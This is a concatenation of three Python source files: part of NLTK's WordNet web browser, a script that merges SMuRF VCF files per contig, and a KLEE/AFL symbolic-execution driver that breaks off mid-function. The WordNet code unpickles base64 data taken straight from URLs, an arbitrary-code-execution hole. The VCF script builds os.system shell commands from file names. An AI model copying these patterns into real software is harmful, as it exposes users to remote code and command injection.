def _collect_all_synsets(word, pos, synset_relations=None):
    """
    Return a HTML unordered list of synsets for the given word and
    part of speech.

    ``synset_relations`` defaults to an empty dict; the previous
    ``dict()`` default was a shared mutable default argument.
    """
    if synset_relations is None:
        synset_relations = {}
    return '<ul>%s\n</ul>\n' % \
        ''.join((_collect_one_synset(word, synset, synset_relations)
                 for synset
                 in wn.synsets(word, pos)))
def _synset_relations(word, synset, synset_relations):
    '''
    Builds the HTML string for the relations of a synset

    :param word: The current word
    :type word: str
    :param synset: The synset for which we're building the relations.
    :type synset: Synset
    :param synset_relations: synset keys and relation types for which to display relations.
    :type synset_relations: dict(synset_key, set(relation_type))
    :return: The HTML for a synset's relations
    :rtype: str
    '''
    if not synset.name in synset_relations:
        return ""
    ref = Reference(word, synset_relations)

    def relation_html(r):
        # Render one related item: Synsets become lookup links, Lemmas
        # delegate to their synset, and (synset, children) tuples render
        # as a nested list (tree).
        if isinstance(r, Synset):
            return make_lookup_link(Reference(r.lemma_names[0]), r.lemma_names[0])
        elif isinstance(r, Lemma):
            return relation_html(r.synset)
        elif isinstance(r, tuple):
            # It's probably a tuple containing a Synset and a list of
            # similar tuples.  This forms a tree of synsets.
            return "%s\n<ul>%s</ul>\n" % \
                (relation_html(r[0]),
                 ''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]))
        else:
            raise TypeError("r must be a synset, lemma or list, it was: type(r) = %s, r = %s" % (type(r), r))

    def make_synset_html(db_name, disp_name, rels):
        # Link that toggles this relation's visibility; the expanded
        # contents follow when the relation is currently displayed.
        synset_html = '<i>%s</i>\n' % \
            make_lookup_link(
                copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
                disp_name)

        if db_name in ref.synset_relations[synset.name]:
            synset_html += '<ul>%s</ul>\n' % \
                ''.join("<li>%s</li>\n" % relation_html(r) for r in rels)

        return synset_html

    # Skip relations with no entries (rel_data[2] == []).
    html = '<ul>' + \
        '\n'.join(("<li>%s</li>" % make_synset_html(*rel_data) for rel_data
                   in get_relations_data(word, synset)
                   if rel_data[2] != [])) + \
        '</ul>'

    return html
class Reference(object):
    """
    A reference to a page that may be generated by page_word
    """

    def __init__(self, word, synset_relations=None):
        """
        Build a reference to a new page.

        word is the word or words (separated by commas) for which to
        search for synsets of

        synset_relations is a dictionary of synset keys to sets of
        synset relation identifaiers to unfold a list of synset
        relations for.  Defaults to a fresh empty dict per instance.
        (The previous ``dict()`` default was a mutable default argument
        shared by every Reference; the toggle methods below mutate it,
        so state could leak between unrelated references.)
        """
        self.word = word
        self.synset_relations = {} if synset_relations is None else synset_relations

    def encode(self):
        """
        Encode this reference into a string to be used in a URL.
        """
        # This uses a tuple rather than an object since the python
        # pickle representation is much smaller and there is no need
        # to represent the complete object.
        string = pickle.dumps((self.word, self.synset_relations), -1)
        return base64.urlsafe_b64encode(string)

    def toggle_synset_relation(self, synset, relation):
        """
        Toggle the display of the relations for the given synset and
        relation type.

        This function will throw a KeyError if the synset is currently
        not being displayed.
        """
        if relation in self.synset_relations[synset.name]:
            self.synset_relations[synset.name].remove(relation)
        else:
            self.synset_relations[synset.name].add(relation)
        return self

    def toggle_synset(self, synset):
        """
        Toggle displaying of the relation types for the given synset
        """
        if synset.name in self.synset_relations:
            del self.synset_relations[synset.name]
        else:
            self.synset_relations[synset.name] = set()
        return self
def decode_reference(string):
    """
    Decode a reference encoded with Reference.encode
    """
    payload = base64.urlsafe_b64decode(string)
    word, synset_relations = pickle.loads(payload)
    return Reference(word, synset_relations)
def make_lookup_link(ref, label):
    """Build an <a> element whose href carries *ref*'s encoding for the
    lookup_ route handled by the server."""
    return '<a href="lookup_{0}">{1}</a>'.format(ref.encode(), label)
def page_from_word(word):
    """
    Return a HTML page for the given word.

    :param word: The currently active word
    :type word: str
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    """
    ref = Reference(word)
    return page_from_reference(ref)
def page_from_href(href):
    '''
    Returns a tuple of the HTML page built and the new current word

    :param href: The hypertext reference to be solved
    :type href: str
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    '''
    ref = decode_reference(href)
    return page_from_reference(ref)
def page_from_reference(href):
    '''
    Returns a tuple of the HTML page built and the new current word

    :param href: The hypertext reference to be solved
    :type href: str
    :return: A tuple (page,word), where page is the new current HTML page
             to be sent to the browser and
             word is the new current word
    :rtype: A tuple (str,str)
    '''
    word = href.word
    pos_forms = defaultdict(list)
    words = word.split(',')
    # Normalise: strip, lower-case, spaces to underscores, drop empties.
    words = [w for w in [w.strip().lower().replace(' ', '_')
                         for w in words]
             if w != ""]
    if len(words) == 0:
        # No words were found.
        # NOTE(review): the message occupies the *word* slot of the
        # (page, word) tuple -- confirm the caller renders it sensibly.
        return "", "Please specify a word to search for."

    # This looks up multiple words at once.  This is probably not
    # necessary and may lead to problems.
    for w in words:
        for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
            form = wn.morphy(w, pos)
            if form and form not in pos_forms[pos]:
                pos_forms[pos].append(form)
    body = ''
    for pos,pos_str,name in _pos_tuples():
        if pos in pos_forms:
            body += _hlev(3, name) + '\n'
            for w in pos_forms[pos]:
                # Not all words of exc files are in the database, skip
                # to the next word if a KeyError is raised.
                try:
                    body += _collect_all_synsets(w, pos, href.synset_relations)
                except KeyError:
                    pass
    if not body:
        body = "The word or words '%s' where not found in the dictonary." % word
    return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
    """
    Return a static HTML page from the path given.

    Known paths map to generated static pages; any other path yields an
    error message.  (An unreachable block that read ``path`` from disk
    after the final ``return`` statement has been removed -- every branch
    above it already returned.)
    """
    if path == "index_2.html":
        return get_static_index_page(False)
    elif path == "index.html":
        return get_static_index_page(True)
    elif path == "NLTK Wordnet Browser Database Info.html":
        return "Display of Wordnet Database Statistics is not supported"
    elif path == "upper_2.html":
        return get_static_upper_page(False)
    elif path == "upper.html":
        return get_static_upper_page(True)
    elif path == "web_help.html":
        return get_static_web_help_page()
    elif path == "wx_help.html":
        return get_static_wx_help_page()
    else:
        return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
    """
    Return the static web help page (a complete HTML document as a string).
    """
    return \
"""
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
    """Return the static HTML fragment used as the browser's welcome/help page."""
    welcome_html = """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
    return welcome_html
def get_static_index_page(with_shutdown):
    """Return the static top-level frameset page.

    The upper frame links to the page with the shutdown button when
    *with_shutdown* is true, otherwise to the variant without it.
    """
    # %% in the template survives %-formatting as a literal percent sign.
    frameset_template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
    upper_link = "upper.html" if with_shutdown else "upper_2.html"
    return frameset_template % upper_link
def get_static_upper_page(with_shutdown):
    """Return the upper frame page.

    If *with_shutdown* is true a 'shutdown' link is included so the first
    client can stop the server; otherwise the slot is left empty.
    """
    upper_template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
    shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>" if with_shutdown else ""
    return upper_template % shutdown_link
def usage():
    """
    Display the command line help message.
    """
    # The usage text is kept in the module docstring.
    print(__doc__)
def app():
    """Parse command-line options, then either print help or launch the browser."""
    opts, _ = getopt.getopt(
        argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
    )
    # Defaults used when an option is not supplied.
    port = 8000
    server_mode = False
    help_mode = False
    logfilename = None
    for opt, value in opts:
        if opt in ("-l", "--logfile"):
            logfilename = str(value)
        elif opt in ("-p", "--port"):
            port = int(value)
        elif opt in ("-s", "--server-mode"):
            server_mode = True
        elif opt in ("-h", "--help"):
            help_mode = True
    if help_mode:
        usage()
    else:
        # Non-server mode also opens a browser window (second argument).
        wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
    app()

# Only the command-line entry point is part of the public API.
__all__ = ['app']
|
merge_smurf_vcfs.py | #!/usr/bin/python
import vcf as pyvcf
import argparse
import re
import os
import sys
import collections
import multiprocessing as mp
import queue
import time
# Union of contig names across all input VCFs, filled in main() and shared
# with the worker processes / merge_tmp_vcfs().
contig_list = []
def main():
    """Merge the input SMuRF vcfs per contig using a pool of worker processes."""
    # Collect the union of contig names over all readers, first-seen order.
    for vcf_reader in vcf_readers:
        for contig in vcf_reader.contigs:
            if contig not in contig_list:
                contig_list.append(contig)
    # Create an input queue with the contigs and an empty output queue
    q = mp.Queue()
    q_out = mp.Queue()
    for contig in contig_list:
        q.put(contig)
    # Create number of processes to parse the vcf file
    processes = [mp.Process(target=parse_chr_vcfs, args=(q, q_out, vcf_readers)) for x in range(args.threads)]
    for p in processes:
        p.start()
    liveprocs = list(processes)
    while liveprocs:
        time.sleep(5)
        try:
            # Drain the output queue so workers never block on a full pipe;
            # the "Done" markers themselves are discarded.
            while 1:
                # NOTE(review): timeout is ignored when block=False.
                done = q_out.get(block=False, timeout=1)
        except queue.Empty:
            pass
        # Give tasks a chance to put more data in
        time.sleep(10)
        if not q.empty():
            continue
        # Re-check which workers are still running; loop ends when none are.
        liveprocs = [p for p in liveprocs if p.is_alive()]
    for p in processes:
        p.join()
def get_command_line():
    """
    Reconstruct the command line from the parsed arguments.

    Return: A quoted string with the actual command.
    """
    cmdline = [sys.argv[0]]
    for name in vars(args):
        value = getattr(args, name)
        if isinstance(value, list):
            # Repeat the flag once per list element (append-type arguments).
            for item in value:
                cmdline.append('--{} {}'.format(name, str(item)))
        else:
            cmdline.append('--{} {}'.format(name, str(value)))
    return '"{}"'.format(" ".join(cmdline))
# Set arguments (the parser was previously constructed twice; once suffices).
parser = argparse.ArgumentParser(description='Put here a description.')
parser.add_argument('-i', '--input', action='append', type=str, help='Input indexed SMuRF.vcf.gz file', required=True)
parser.add_argument('-o', '--output', default="SMuRF", type=str, help='Name of output file (default: %(default)s)')
parser.add_argument('-t', '--threads', default=8, type=int, help='Number of threads (default: %(default)s)')
args = parser.parse_args()

# Open one reader per input file and collect sample bookkeeping:
#   header_samples - every sample column, used for the merged header
#   sample_names   - tumour/test samples (controls removed)
#   normal_names   - control samples recorded in the SMuRF command metadata
vcf_readers = []
header_samples = []
sample_names = []
normal_names = []
for input_file in args.input:
    vcf_reader = pyvcf.Reader(filename=input_file, encoding='utf-8')
    sample_names.extend(vcf_reader.samples)
    header_samples.extend(vcf_reader.samples)
    # The controls are recorded as '--normal <name>' in the SMuRFCmd header line.
    for control in re.findall(r"--normal\s+(\S+)", vcf_reader.metadata['SMuRFCmd'][0]):
        if control != "None":
            normal_names.append(control)
            if control in sample_names:
                sample_names.remove(control)
    vcf_readers.append(vcf_reader)

vcf_name = os.path.basename(args.output)

# Create tmp directory if it does not exist (previously a bare try/except
# around os.stat; makedirs with exist_ok is equivalent and explicit).
os.makedirs('./SMuRF_tmp', exist_ok=True)
def parse_chr_vcfs(q, q_out, contig_vcf_readers):
    """Worker process: pop contig names from *q*, merge that contig's passing
    records across all readers, write them to a tmp vcf and push a "Done"
    marker onto *q_out* for each finished contig."""
    while True:
        try:
            # NOTE(review): timeout is ignored when block=False.
            contig = q.get(block=False,timeout=1)
            #contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF_reannotate.vcf'.format(contig),'w', encoding='utf-8'), contig_vcf_reader)
            #vcf_reader.metadata['SMuRF_merge'] = [get_command_line()]
            merged_records = {}
            for contig_vcf_reader in contig_vcf_readers:
                record_dict = get_record_dict( contig, contig_vcf_reader)
                if not record_dict:
                    # Contig absent from this vcf (or no passing records).
                    continue
                if not merged_records:
                    merged_records = record_dict
                else:
                    # Positions present in both sides become lists of records.
                    merged_records = mergeDict( merged_records, record_dict )
            if merged_records:
                # The first reader only supplies the header template.
                merge_records(merged_records, contig, contig_vcf_readers[0])
            q_out.put( "Done" )
        # Break the loop if the queue is empty
        except queue.Empty:
            break
def merge_records(merged_records, contig, contig_vcf_reader):
    """Fold per-reader records of one contig together and write a tmp vcf.

    *merged_records* maps (contig, pos) to either a single record or a list of
    records (one per input vcf with a passing call at that position).  Lists
    are merged into their first record: the paired NAME/count INFO fields are
    concatenated and the per-sample calls appended.  Samples missing from a
    record get empty calls and are counted as ABSENT, and the merge-level
    FILTER flags are re-derived before writing.

    The original implementation repeated the same extend-and-add stanza ten
    times with inconsistent presence checks; it is now data driven, with a
    uniform presence check covering the optional *_QC_CONTROL fields.
    """
    # (NAMES list key, paired count key) INFO fields concatenated across records.
    counted_fields = [
        ('ABSENT_SAMPLE_NAMES', 'ABSENT_SAMPLES'),
        ('SUBCLONAL_SAMPLE_NAMES', 'SUBCLONAL_SAMPLES'),
        ('CLONAL_SAMPLE_NAMES', 'CLONAL_SAMPLES'),
        ('ABSENT_CONTROL_NAMES', 'ABSENT_CONTROLS'),
        ('SUBCLONAL_CONTROL_NAMES', 'SUBCLONAL_CONTROLS'),
        ('CLONAL_CONTROL_NAMES', 'CLONAL_CONTROLS'),
        ('FAIL_QC_SAMPLE_NAMES', 'FAIL_QC_SAMPLES'),
        ('PASS_QC_SAMPLE_NAMES', 'PASS_QC_SAMPLES'),
        ('FAIL_QC_CONTROL_NAMES', 'FAIL_QC_CONTROLS'),
        ('PASS_QC_CONTROL_NAMES', 'PASS_QC_CONTROLS'),
    ]
    contig_vcf_reader.samples = header_samples
    contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF_merged.vcf'.format(contig), 'w', encoding='utf-8'), contig_vcf_reader)
    for key in merged_records:
        if type(merged_records[key]) is list:
            # Fold all sibling records into the first one.
            record = merged_records[key][0]
            for record2 in merged_records[key][1:]:
                if 'MERGED' not in record.INFO:
                    record.INFO['MERGED'] = 0
                record.INFO['MERGED'] += 1
                for names_key, count_key in counted_fields:
                    if names_key not in record.INFO or names_key not in record2.INFO:
                        continue
                    # [''] is SMuRF's encoding for "no names recorded".
                    if record2.INFO[names_key] != ['']:
                        record.INFO[names_key].extend(record2.INFO[names_key])
                        record.INFO[count_key] += record2.INFO[count_key]
                record.samples.extend(record2.samples)
        else:
            record = merged_records[key]
        # Template for an "absent" genotype matching this record's FORMAT.
        format_field = record.FORMAT.split(":")
        genotype = {}
        for f in format_field:
            genotype[f] = './.' if f == "GT" else None
        samples_data = []
        for sample in header_samples:
            if sample in sample_names:
                samples_data.append(_sample_call(record, sample, 'SAMPLE', format_field, genotype))
            if sample in normal_names:
                samples_data.append(_sample_call(record, sample, 'CONTROL', format_field, genotype))
        record.samples = samples_data
        # Re-derive the merge-level filter flags from the combined counts.
        if record.INFO['CLONAL_SAMPLES'] == 0:
            record.FILTER.append('NoClonalSample')
        if record.INFO['CLONAL_CONTROLS'] > 0:
            record.FILTER.append('ControlClonal')
        if record.INFO['SUBCLONAL_CONTROLS'] > 0:
            record.FILTER.append('ControlSubclonal')
        contig_vcf_flag_writer.write_record(record)

def _sample_call(record, sample, group, format_field, genotype):
    """Return the vcf call for *sample*; when the sample appears in none of
    the CLONAL/SUBCLONAL/ABSENT name lists of *group* ('SAMPLE' or 'CONTROL')
    it is registered as ABSENT and an empty call is returned."""
    name_keys = ['{}_{}_NAMES'.format(state, group) for state in ('CLONAL', 'SUBCLONAL', 'ABSENT')]
    if all(sample not in record.INFO[k] for k in name_keys):
        record.INFO['ABSENT_{}_NAMES'.format(group)].append(sample)
        record.INFO['ABSENT_{}S'.format(group)] += 1
        return pyvcf.model._Call('site', sample, collections.namedtuple('CallData', format_field)(**genotype))
    return pyvcf.model._Call('site', sample, record.genotype(sample).data)
def mergeDict(dict1, dict2):
    '''Merge dictionaries and keep values of common keys in a flat list.

    For a key present in both inputs the result holds a list with dict2's
    value first, followed by dict1's value(s).  If dict1's value is already a
    list (from a previous merge) the new value is prepended to it instead of
    nesting, so chained merges of three or more vcfs yield a flat list of
    records rather than nested lists (the original produced [new, [a, b]],
    which broke merge_records for 3+ input files).
    '''
    dict3 = {**dict1, **dict2}
    for key in dict3:
        if key in dict1 and key in dict2:
            previous = dict1[key]
            if isinstance(previous, list):
                # Flatten: prepend the new value to the accumulated list.
                dict3[key] = [dict2[key]] + previous
            else:
                dict3[key] = [dict2[key], previous]
    return dict3
def get_record_dict(contig, contig_vcf_reader):
    """Collect the passing records of one contig from an indexed vcf.

    Returns a dict mapping (contig, POS) -> record for every record whose
    FILTER is empty after dropping the SMuRF merge-level flags, or False when
    the contig is not present in this vcf.
    """
    record_dict = {}
    try:
        # Probe: fetch raises when the contig is absent from the index.
        contig_vcf_reader.fetch(contig)
    except Exception:
        # Skip contig if it is not present in the vcf file
        return False
    for record in contig_vcf_reader.fetch(contig):
        # Drop previously applied merge filters so they can be re-derived
        # from the merged counts later.
        for fil in ['NoClonalSample', 'ControlClonal', 'ControlSubclonal']:
            if fil in record.FILTER:
                record.FILTER.remove(fil)
        if not record.FILTER:
            record_dict[(contig, record.POS)] = record
    return record_dict
def merge_tmp_vcfs():
    """
    Function to merge all the tmp contig vcf files into <output>_merged.vcf
    and produce a PASS-only filtered copy next to it.
    """
    start = time.time()  # NOTE(review): timing anchor is never used
    header = False
    # Loop through all chromosomes; the first file is copied whole so the
    # output gets exactly one vcf header, the rest are appended headerless.
    for contig in contig_list:
        if not header:
            os.system('cat SMuRF_tmp/{}_SMuRF_merged.vcf > {}_merged.vcf'.format(contig, vcf_name))
            header = True
        else:
            os.system('grep -v \'^#\' SMuRF_tmp/{}_SMuRF_merged.vcf >> {}_merged.vcf'.format(contig, vcf_name))
    # Keep header lines plus records whose FILTER column is PASS.
    os.system("grep -P '^#|\s+PASS\s+' "+vcf_name+"_merged.vcf > "+vcf_name+"_merged_filtered.vcf")
    time.sleep(5)
    #os.system("rm -rf SMuRF_tmp")
if __name__ == "__main__":
    #get_command_line()
    # Merge per-contig in parallel, then concatenate the tmp files.
    main()
    merge_tmp_vcfs()
|
klee_sym_explorer.py | import ConfigParser
import multiprocessing
import subprocess
import os
import sys
import utils
import signal
from utils import bcolors
def se_info(s):
    # Print a tagged, colorized status line for the symbolic explorer.
    print bcolors.HEADER+"[KleeSym-Info]"+bcolors.ENDC," {0}".format(s)
class SymExplorer:
    """Driver that launches KLEE symbolic-execution instances seeded from AFL
    test cases and synchronizes their results back through AFL-style sync
    directories.  Configuration comes from an ini-style file; the `utils`
    helpers and the seed converter binary are defined elsewhere."""

    def __init__(self, config, target):
        # pid -> task metadata for every launched klee instance (internal
        # ids minted by get_new_pid, not OS pids).
        self.jobs = {}
        self.started_jobs = set()
        self.config = config
        self.target = target
        self.get_config()
        utils.mkdir_force(self.seed_dir)
        self.pid_ctr = 0
        se_info("Symbolic Explorer using searcher[{0}]".format(''.join(self.get_search_heuristics())))

    def get_config(self):
        # Load all settings from the ini-style config file; most paths are
        # templated on "@target".
        config = ConfigParser.ConfigParser()
        config.read(self.config)
        self.bin = config.get("klee sym_explorer", "bin")
        self.converter = config.get("klee sym_explorer","converter")
        self.seed_dir = config.get("klee sym_explorer", "klee_seed_dir").replace("@target", self.target)
        self.search_heuristics = config.get("klee sym_explorer", "search_heuristic").split(":")
        # target_bc holds the bitcode path followed by the program options.
        self.target_bc = config.get("klee sym_explorer", "target_bc").replace("@target", self.target).split()[0]
        self.options = config.get("klee sym_explorer", "target_bc").replace("@target", self.target).split()[1:]
        self.klee_err_dir = config.get("klee sym_explorer", "error_dir").replace("@target", self.target)
        # print "XXX", self.options
        try:
            self.max_output = config.get("klee sym_explorer", "max_interesting_output")
        except Exception:
            self.max_output = None
        try:
            # NOTE(review): reads the "klee conc_explorer" section here and
            # below -- possibly copy-pasted from the concolic explorer;
            # confirm the intended section name.
            self.max_mem = config.get("klee conc_explorer", "max_memory")
        except Exception:
            self.max_mem = str(1024*1024*20) # in kbytes
        try:
            self.max_time_per_seed = config.get("klee conc_explorer", "max_time_per_seed")
        except Exception:
            # by default no time limit per seed.
            self.max_time_per_seed = 0
        self.bitmodel = config.get("moriarty", "bitmodel")
        # '@@' in the options means the target reads an input file (AFL
        # convention), otherwise input arrives on stdin.
        self.input_type = 'symfile' if '@@' in self.options else 'stdin'
        self.sync_dir_base = config.get("moriarty", "sync_dir").replace("@target", self.target)
        if "AFLUnCovSearcher" in self.get_search_heuristics():
            self.fuzzer_cov_file = config.get("auxiliary info", "cov_edge_file").replace("@target", self.target)
        #handling cxx options
        try:
            self.klee_ctor_stub = True if config.get("klee sym_explorer", "klee_ctor_stub") == '1' else False
        except Exception:
            self.klee_ctor_stub = True
        try:
            self.klee_uclibcxx = True if config.get("klee sym_explorer", "klee_uclibcxx") == '1' else False
        except Exception:
            self.klee_uclibcxx = False

    def get_search_heuristics(self):
        """return a list of search heuristics"""
        return self.search_heuristics

    def __repr__(self):
        return "SE Engine: KLEE Symbolic Explorer"

    def alive(self):
        # Return True if any launched klee instance is still running.
        alive = False
        multiprocessing.active_children()  # side effect: reaps finished children
        for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
            try:
                # Signal 0 is an existence probe; it raises if pid is gone.
                os.kill(pid, 0)
                print "sym_explorer pid: {0} is alive".format(pid)
                alive = True
            except Exception:
                print "sym_explorer pid: {0} not alive".format(pid)
        # cmd = 'ps -e | grep klee | wc -l'
        # if 0 == subprocess.Popen(cmd, shell=True).communicate()[0]:
        # alive = False
        return alive

    def run(self, input_id_map_list, cov_file_list):
        """
        For each input,
        -convert ktest
        -create sync dir
        -build cmd
        -create new process job
        """
        se_info("{0} activated. input list : {1}".format(self, input_id_map_list))
        for input_id_map in input_id_map_list:
            pid = self.get_new_pid()
            # NOTE(review): input_idx is reset to 0 on every iteration, so
            # cov_file_list[0] is always used below -- looks like it was meant
            # to be initialized before the loop; confirm.
            input_idx = 0
            #--generate klee seed ktest
            # print input_id_map
            afl_input = input_id_map['input']
            klee_seed = self.seed_dir+"/klee_instance_sym_"+str(pid).zfill(6)+".ktest"
            # print "before calling converter"
            # print afl_input
            self.call_converter("a2k", afl_input, klee_seed, self.bitmodel, self.input_type)
            if not os.path.exists(klee_seed):
                # Conversion failed; skip this input.
                print "no seed" + klee_seed
                continue
            #--create sync_dir for new klee instance
            key = "klee_instance_sym_" + str(pid).zfill(6)
            new_sync_dir = self.sync_dir_base+"/"+key+"/queue"
            utils.mkdir_force(new_sync_dir)
            #--build klee instance cmd
            edge_ids = [x for x in input_id_map['interesting_edges']]
            stdin_len = os.path.getsize(afl_input)
            klee_cmd = self.build_cmd(klee_seed, edge_ids, new_sync_dir, stdin_len, afl_input, cov_file_list[input_idx])
            print ' '.join(klee_cmd)
            #--construct process meta data, add to jobs list
            kw = {'mock_eof':True,'mem_cap': self.max_mem}
            p = multiprocessing.Process(target=utils.exec_async, args=[klee_cmd], kwargs=kw)
            p.daemon = True
            task_st = {}
            task_st['instance'] = p
            task_st['sync_dir'] = new_sync_dir
            task_st['seed'] = klee_seed
            task_st['cmd'] = klee_cmd
            if "AFLUnCovSearcher" in self.get_search_heuristics():
                task_st['afl_cov'] = self.fuzzer_cov_file
            self.jobs[pid] = task_st
            input_idx = input_idx + 1
        # Start every job that has not been started in a previous call.
        for pid, task in self.jobs.iteritems():
            try:
                if pid not in self.started_jobs:
                    task['instance'].start()
                    task['real_pid'] = task['instance'].pid
                    # print "starting klee process: ", task['real_pid']
                    self.started_jobs.add(pid)
                else:
                    se_info("WTF the process {0} is already started".format(pid))
            except Exception:
                pass
        # NOTE(review): 'key' holds the value from the last loop iteration;
        # if input_id_map_list is empty this raises NameError.
        return (key, [x['input'] for x in input_id_map_list])

    def stop(self):
        """
        Terminate all jobs,
        you could have more fine-grained control by extending this function
        """
        se_info("{0} deactivated".format(self))
        for pid, task in self.jobs.iteritems():
            se_info("Terminting klee instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
            utils.terminate_proc_tree(task['real_pid'])
        #reset jobs queue
        self.jobs = {}
        # self.started_jobs= set()

    def build_cmd(self, ktest_seed, edge_ids, sync_dir, stdin_len, afl_input, out_cov_file):
        """
        each afl_testcase will have a list of branch ids,
        we use these info to construct the command for
        starting a new klee instance
        by default:
        use klee's own searching algo
        if specified afl_uncov in config, use AFLUnCovSearcher
        """
        cmd = []
        afl_uncov = "--afl-covered-branchid-file="
        klee_out_uncov = "--klee-covered-branchid-outfile="
        # max_output = "-max-interesting-seinfo="
        sync_dir_flag = "--sync-dir="
        stdin_sym_flag = "--sym-stdin"
        file_sym_flag = "--sym-files"
        sanitizer_searcher_flag = "--edge-sanitizer-heuristic"
        if self.klee_uclibcxx == True:
            klee_libc = "--libc=uclibcxx"
        else:
            klee_libc = "--libc=uclibc"
        if self.klee_ctor_stub == True:
            klee_ctor_stub="--disable-inject-ctor-and-dtor=false"
        else:
            klee_ctor_stub="--disable-inject-ctor-and-dtor=true"
        common_prefix = [self.bin,
                         klee_libc,
                         klee_ctor_stub,
                         "--posix-runtime",
                         "--only-replay-seeds",
                         "--symbolic-explorer=true",
